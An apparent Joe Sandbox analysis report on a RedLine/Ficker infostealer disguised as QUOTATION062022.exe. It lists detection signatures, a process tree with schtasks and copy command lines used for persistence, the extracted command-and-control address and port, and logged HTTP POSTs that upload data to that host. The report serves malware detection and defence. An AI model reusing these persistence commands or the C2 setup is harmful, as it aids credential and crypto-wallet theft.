Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION062022.exe

Overview

General Information

Sample Name:QUOTATION062022.exe
Analysis ID:648537
MD5:87af8a3865f441eb06b4ebbeea330099
SHA1:592b904653dfa0c2a82447d283a9187c9a2145b1
SHA256:83a8d60614fba531f23e6206d82589e0a197eb4fcb98df32083651281e7e243d
Tags:exeRedLineStealer
Infos:

Detection

Ficker Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Ficker Stealer
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • QUOTATION062022.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\QUOTATION062022.exe" MD5: 87AF8A3865F441EB06B4EBBEEA330099)
    • vbc.exe (PID: 6728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6780 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6888 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 6904 cmdline: cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Data.exe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: 87AF8A3865F441EB06B4EBBEEA330099)
    • vbc.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6520 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6312 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 6940 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 30 entries
                SourceRuleDescriptionAuthorStrings
                4.0.vbc.exe.400000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  4.0.vbc.exe.400000.1.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    4.0.vbc.exe.400000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      4.0.vbc.exe.400000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165e6:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165c7:$v2_6: GetUpdates
                      4.0.vbc.exe.400000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 71 entries
                        No Sigma rule has matched
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: QUOTATION062022.exeVirustotal: Detection: 47%Perma Link
                        Source: QUOTATION062022.exeReversingLabs: Detection: 48%
                        Source: http://185.222.58.90:17910Avira URL Cloud: Label: malware
                        Source: http://185.222.58.90:1Avira URL Cloud: Label: malware
                        Source: http://185.222.58.90:17910/Avira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeReversingLabs: Detection: 48%
                        Source: QUOTATION062022.exeJoe Sandbox ML: detected
                        Source: 23.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                        Source: QUOTATION062022.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: QUOTATION062022.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49834
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49834
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1108528Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1108520Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1107783Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1107775Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 185.222.58.90 185.222.58.90
                        Source: global trafficTCP traffic: 192.168.2.3:49742 -> 185.222.58.90:17910
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ok9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:1
                        Source: vbc.exe, 00000004.00000002.379436483.0000000007421000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                        Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:179104
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348363338.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.474849036.00000000056D5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.483489857.00000000056D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.rea
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                        Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1_
                        Source: vbc.exe, 00000004.00000003.377169989.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377236233.000000000D2C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377186734.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.366510707.000000000D2B1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                        Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g_
                        Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                        Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj_
                        Source: vbc.exe, 00000004.00000002.379532591.00000000074CE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
